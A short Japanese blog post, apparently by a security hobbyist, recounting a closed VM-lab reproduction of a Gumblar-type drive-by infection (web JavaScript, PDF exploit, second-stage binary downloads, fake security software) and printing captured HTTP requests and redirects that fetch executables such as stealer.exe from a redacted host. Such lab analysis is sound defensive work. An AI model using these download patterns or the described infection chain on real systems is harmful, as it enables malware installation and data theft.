Gumblar.8080系とか
キャプチャーデータを元に、VMで構築したクローズな実験環境で2次感染するまでを再現。次のセミナーネタに使わせてもらおう。
WebサイトのJSを踏んでPDFファイルを表示しようとして、PDFのJSでバグを踏み、2次感染サーバから4本ほどバイナリをダウンロードして実行。C&Cサーバの指令を待ちつつSecurityToolsをインストールされるという流行なパターン。
2次感染を指令するサーバのプロトコル、といってもとても単純なモノを再現できたので、好きなバイナリをエージェントに転送可能。
問い合わせ先ホスト名は省略してるけど、こんな感じで複数のWEBサーバにリクエスト投げてる所まで追えます。もちろん各バイナリも入手済み。
GET /x/exe.php?src=marcos&id=bomba&x=pdf3 HTTP/1.1
Content-Disposition: inline; filename=setup.exeGET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=YzOKcpxXGc HTTP/1.1
Location: http://xxxx.in/x/severa.exeGET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=IQstcbzfrW HTTP/1.1
Location: http://xxxx.in/x/dogma.exeGET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=pTMkfVYAsc HTTP/1.1
Location: http://xxxx.in/x/toolbar.exeGET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=nrpQDYvYbw HTTP/1.1
Location: http://xxxx.in/x/stealer.exeGET /l.php?id=impuqhzLqpLEoEh&os=5.1&src=v&requestID=UUKHpSuscD HTTP/1.1
Content-Disposition: inline; filename=null.exeGET /get.php?c=CUBYKOGW&d=〜
BOTの指令サーバまで再現できなかったのが心残りかな。さすがに手間がかかりすぎるので、バイナリの解析も含めて、素人はここらでやめておきます。